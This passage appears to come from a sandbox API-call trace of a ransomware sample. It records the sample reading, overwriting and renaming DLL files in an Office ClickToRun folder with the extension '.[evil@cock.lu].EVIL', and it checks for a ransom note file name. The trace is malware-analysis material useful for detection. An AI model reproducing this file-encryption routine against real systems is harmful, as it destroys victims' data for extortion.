_Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll") returned 89 [0081.106] wcscmp (_String1="api-ms-win-crt-heap-l1-1-0.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0081.106] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="api-ms-win-crt-heap-l1-1-0.dll") returned 0x0 [0081.106] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll") returned 0x59 [0081.106] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-heap-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0081.108] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x4cc0, lpOverlapped=0x0) returned 1 [0081.154] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0081.154] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0081.154] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0081.154] _errno () returned 0x84b1160840 [0081.154] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.154] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x4ce0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x4ce0, lpOverlapped=0x0) returned 1 [0081.155] CloseHandle (hObject=0x1a4) returned 1 [0081.155] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0081.156] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0081.156] __uncaught_exception () returned 0x84b1160800 [0081.156] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0081.157] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-heap-l1-1-0.dll"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-heap-l1-1-0.dll.[evil@cock.lu].evil")) returned 1 [0081.157] ??_V@YAXPEAX@Z () returned 0x1 [0081.160] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll", dwFileAttributes=0x0) returned 0 [0081.160] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0081.160] wcsstr (_Str="api-ms-win-crt-locale-l1-1-0.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0081.160] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll") returned 91 [0081.160] wcscmp (_String1="api-ms-win-crt-locale-l1-1-0.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0081.160] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="api-ms-win-crt-locale-l1-1-0.dll") returned 0x0 [0081.160] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll") returned 0x5b [0081.160] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-locale-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0081.162] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x4ac0, lpOverlapped=0x0) returned 1 [0081.181] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0081.181] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0081.181] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0081.181] _errno () returned 0x84b1160840 [0081.181] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.181] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x4ae0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x4ae0, lpOverlapped=0x0) returned 1 [0081.182] CloseHandle (hObject=0x1a4) returned 1 [0081.183] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0081.183] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0081.183] __uncaught_exception () returned 0x84b1160800 [0081.183] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0081.185] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-locale-l1-1-0.dll"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-locale-l1-1-0.dll.[evil@cock.lu].evil")) returned 1 [0081.186] ??_V@YAXPEAX@Z () returned 0x1 [0081.189] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll", dwFileAttributes=0x0) returned 0 [0081.190] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0081.190] wcsstr (_Str="api-ms-win-crt-math-l1-1-0.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0081.190] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll") returned 89 [0081.190] wcscmp (_String1="api-ms-win-crt-math-l1-1-0.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0081.190] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="api-ms-win-crt-math-l1-1-0.dll") returned 0x0 [0081.190] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll") returned 0x59 [0081.190] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-math-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0081.192] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x6cc0, lpOverlapped=0x0) returned 1 [0081.260] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0081.260] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0081.260] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0081.260] _errno () returned 0x84b1160840 [0081.260] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.260] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x6ce0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x6ce0, lpOverlapped=0x0) returned 1 [0081.260] CloseHandle (hObject=0x1a4) returned 1 [0081.261] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0081.262] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0081.262] __uncaught_exception () returned 0x84b1160800 [0081.262] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0081.263] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-math-l1-1-0.dll"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-math-l1-1-0.dll.[evil@cock.lu].evil")) returned 1 [0081.263] ??_V@YAXPEAX@Z () returned 0x1 [0081.267] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll", dwFileAttributes=0x0) returned 0 [0081.267] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0081.267] wcsstr (_Str="api-ms-win-crt-multibyte-l1-1-0.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0081.267] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll") returned 94 [0081.267] wcscmp (_String1="api-ms-win-crt-multibyte-l1-1-0.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0081.267] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="api-ms-win-crt-multibyte-l1-1-0.dll") returned 0x0 [0081.267] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll") returned 0x5e [0081.267] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-multibyte-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0081.270] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x68c0, lpOverlapped=0x0) returned 1 [0081.347] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0081.347] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0081.347] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0081.347] _errno () returned 0x84b1160840 [0081.347] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.347] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x68e0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x68e0, lpOverlapped=0x0) returned 1 [0081.347] CloseHandle (hObject=0x1a4) returned 1 [0081.348] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0081.349] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0081.349] __uncaught_exception () returned 0x84b1160800 [0081.349] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0081.350] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-multibyte-l1-1-0.dll"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-multibyte-l1-1-0.dll.[evil@cock.lu].evil")) returned 1 [0081.350] ??_V@YAXPEAX@Z () returned 0x1 [0081.354] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll", dwFileAttributes=0x0) returned 0 [0081.354] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0081.354] wcsstr (_Str="api-ms-win-crt-private-l1-1-0.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0081.354] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll") returned 92 [0081.354] wcscmp (_String1="api-ms-win-crt-private-l1-1-0.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0081.354] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="api-ms-win-crt-private-l1-1-0.dll") returned 0x0 [0081.354] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll") returned 0x5c [0081.354] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-private-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0081.357] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x114c0, lpOverlapped=0x0) returned 1 [0081.381] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0081.381] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0081.381] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0081.381] _errno () returned 0x84b1160840 [0081.381] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.381] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x114e0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x114e0, lpOverlapped=0x0) returned 1 [0081.382] CloseHandle (hObject=0x1a4) returned 1 [0081.383] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0081.383] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0081.383] __uncaught_exception () returned 0x84b1160800 [0081.384] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0081.385] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-private-l1-1-0.dll"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-private-l1-1-0.dll.[evil@cock.lu].evil")) returned 1 [0081.387] ??_V@YAXPEAX@Z () returned 0x1 [0081.391] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll", dwFileAttributes=0x0) returned 0 [0081.391] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0081.391] wcsstr (_Str="api-ms-win-crt-process-l1-1-0.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0081.391] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll") returned 92 [0081.391] wcscmp (_String1="api-ms-win-crt-process-l1-1-0.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0081.391] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="api-ms-win-crt-process-l1-1-0.dll") returned 0x0 [0081.391] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll") returned 0x5c [0081.391] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-process-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0081.394] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x4cc0, lpOverlapped=0x0) returned 1 [0081.413] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0081.413] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0081.413] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0081.413] _errno () returned 0x84b1160840 [0081.413] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.413] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x4ce0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x4ce0, lpOverlapped=0x0) returned 1 [0081.413] CloseHandle (hObject=0x1a4) returned 1 [0081.416] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0081.416] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0081.416] __uncaught_exception () returned 0x84b1160800 [0081.416] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0081.417] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-process-l1-1-0.dll"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-process-l1-1-0.dll.[evil@cock.lu].evil")) returned 1 [0081.422] ??_V@YAXPEAX@Z () returned 0x1 [0081.427] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll", dwFileAttributes=0x0) returned 0 [0081.427] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0081.427] wcsstr (_Str="api-ms-win-crt-runtime-l1-1-0.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0081.427] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll") returned 92 [0081.427] wcscmp (_String1="api-ms-win-crt-runtime-l1-1-0.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0081.427] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="api-ms-win-crt-runtime-l1-1-0.dll") returned 0x0 [0081.427] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll") returned 0x5c [0081.428] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-runtime-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0081.431] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x5ac0, lpOverlapped=0x0) returned 1 [0081.464] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0081.464] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0081.464] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0081.465] _errno () returned 0x84b1160840 [0081.465] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.465] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x5ae0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x5ae0, lpOverlapped=0x0) returned 1 [0081.465] CloseHandle (hObject=0x1a4) returned 1 [0081.466] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0081.466] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0081.466] __uncaught_exception () returned 0x84b1160800 [0081.467] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0081.468] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-runtime-l1-1-0.dll"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-runtime-l1-1-0.dll.[evil@cock.lu].evil")) returned 1 [0081.468] ??_V@YAXPEAX@Z () returned 0x1 [0081.472] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll", dwFileAttributes=0x0) returned 0 [0081.472] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0081.473] wcsstr (_Str="api-ms-win-crt-stdio-l1-1-0.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0081.473] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll") returned 90 [0081.473] wcscmp (_String1="api-ms-win-crt-stdio-l1-1-0.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0081.473] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="api-ms-win-crt-stdio-l1-1-0.dll") returned 0x0 [0081.473] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll") returned 0x5a [0081.473] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-stdio-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0081.475] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x60c0, lpOverlapped=0x0) returned 1 [0081.501] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0081.501] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0081.501] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0081.501] _errno () returned 0x84b1160840 [0081.501] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.502] 